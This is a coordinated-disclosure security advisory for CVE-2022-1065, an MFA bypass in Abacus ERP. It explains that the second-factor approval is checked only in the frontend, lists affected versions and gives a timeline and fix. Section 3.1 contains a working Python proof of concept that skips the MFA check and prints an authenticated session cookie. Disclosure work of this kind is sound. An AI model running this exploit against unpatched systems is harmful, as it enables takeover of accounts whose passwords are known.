Security Advisory: MFA Bypass in various versions of Abacus (CVE-2022-1065)

Apr 15, 2022 von Roman Gribi

During our penetration testing projects, we discover common relevant vulnerabilities. Read here how we published this vulnerability as a CVE in cooperation with the manufacturer.







1. Summary

Abacus is an owner-managed Swiss software company that employs around 600 people. For over three decades it has developed successful business software [1].

This advisory describes a vulnerability affecting various versions of the Abacus ERP software. The vulnerability relies within the authentication process of Abacus and allows to bypass the second factor. Therefore, it is possible to gain access to the system with the knowledge of a valid username / password combination only and weakening the overall security level [2].

2. Vulnerable versions

The attack has been successfully tested against the following version:

  • v2021 prior to R4 of 2022-01-15
  • v2020 prior to R6 of 2022-01-15

According to vendor information, the following versions are vulnerable as well:

  • v2022 prior to R1 of 2022-01-15
  • v2021 prior to R4 of 2022-01-15
  • v2020 prior to R6 of 2022-01-15
  • v2019 after R5 of 2022-03-15 (service pack)
  • v2018 after R7 of 2022-04-15 (service pack)

2.1 Versions not vulnerable

According to vendor information, the following versions are not vulnerable:

  • v2019 prior to R5 of 2020-03-15
  • v2018 prior to R7 of 2020-04-15
  • v2017 and prior versions

3. Details

The application supports multi factor authentication (MFA) to further strengthen the authentication process. After a user enters valid credentials, a request is sent to the registered Abacus Access app on the mobile device of the user. The user then has to approve the login request before a redirect to the system is performed. However, the verification request which the user has accepted on the mobile phone is only validated on the frontend and not the backend. Due to that, this step can be bypassed by just ignoring the validation.

The following steps are passed during the authentication process: 1. The user accesses the page ‘/portal/myabacus’ 2. The server creates a new session cookie and automatically redirects the user to ‘/oauth/oauth2/v1/auth’ 3. The user enters valid credentials, which are sent to ‘/oauth/oauth2/v1/authenticate’ 4. If the credentials are valid, the backend system triggers the MFA request to the mobile application 5. Until the user has accepted the MFA request on the mobile, the frontend part of the application sends a regular status requests to the backend system to check if the user has already confirmed the request 6. Once the MFA request has been confirmed and the backend sends a successful response in the status request, the authenticated session is bound using a request to ‘/oauth-/oauth2/v1/authenticate/ocra/auth-session-bindings’

However, in the vulnerable versions, step 5 is only validated on the frontend and not on the backend. As such, an attacker can just bypass/omit the status request and directly initiate the session binding from step 6 without further verification of the MFA status on the backend.

Using this approach, it is possible to initiate a fully authenticated session by only providing username / password without the need to enter a second authentication factor.

3.1 Proof of Concept

The following proof of concept generates the necessary requests to generate a valid session id.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import re
import json
import urllib

from urllib.request import HTTPCookieProcessor, Request, build_opener

cookie_processor = HTTPCookieProcessor()
opener = build_opener(cookie_processor)

# Step 1,2 - Generate Session ID
opener.open(Request(BASE_URL + "/portal/myabacus"))

# Step 3 - Perform login and extract values
data = urllib.parse.urlencode(
  {'username':USERNAME,'password':PASSWORD}).encode()
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate", data=data)
res = opener.open(req)
raw = str(res.read())

data_auth = re.search('(?<=data-access-token=")[^"]+', raw).group(0)
data_sid = re.search('(?<=data-auth-session-id=")[^"]+', raw).group(0)
data_rid = re.search('(?<=data-approval-request-id=")[^"]+', raw).group(0)

# Step 6 - Bind auth session to session id without requesting MFA status
data = json.dumps(
  {'authenticationSessionId':data_sid,'approvalRequestId':data_rid}
).encode('utf-8')
req = Request(BASE_URL +
  "/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings")
req.add_header('Authorization', 'Bearer ' + data_auth)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', len(data))
opener.open(req,data=data)

# Do manual redirect in case there is no auto redirect
# This step could be omitted depending on the system configuration
data_code = re.search('(?<=code" value=")[^"]+', raw).group(0)
data_sstate = re.search('(?<=session_state" value=")[^"]+', raw).group(0)
data_state = re.search('(?<="state" value=")[^"]+', raw).group(0)

data = urllib.parse.urlencode(
  {'code':data_code,'session_state':data_sstate,'state':data_state}).encode()
req = Request(BASE_URL + "/portal/myabacus/oauthcb",data=data)
opener.open(req)

# Extract cookie
print("__Secure-MYABACUS_SESSION: " +
  cookie_processor.cookiejar
    ._cookies[DOMAIN]['/portal/myabacus']['__Secure-MYABACUS_SESSION'].value)

3.2 Workaround / Fix

Install the available hot fixes and / or service packs from 2022-01-15 or newer [3].

4. Credits

  • Roman Gribi, Redguard AG

5. Timeline

  • 2021-12-21 : Initial notification of the vendor.
  • 2021-12-29 : Communication of the vulnerability to the vendor.
  • 2022-01-03 : Vendor confirmed the vulnerability and announced a fix will be released.
  • 2022-01-06 : Redguard tested/validated the fix on a test system.
  • 2022-01-15 : Fix released to the public by Abacus Research AG.
  • 2022-03-24 : Initial contact with NCSC as CNA of Switzerland to assign a CVE.
  • 2022-03-24 : CVE-2022-1065 assigned by NCSC [4].
  • 2022-04-15 : Public disclosure of this advisory.

6. About Redguard

Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics.

www.redguard.ch
contact@redguard.ch

7. Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible and indeed likely that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.


References
[1] https://www.abacus.ch/unternehmen/portrait
[2] https://owasp.org/www-project-top-ten/2017/A22017-BrokenAuthentication
[3] https://classic.abacus.ch/downloads-page/servicepacks
[4] https://www.cve.org/CVERecord?id=CVE-2022-1065


< zurück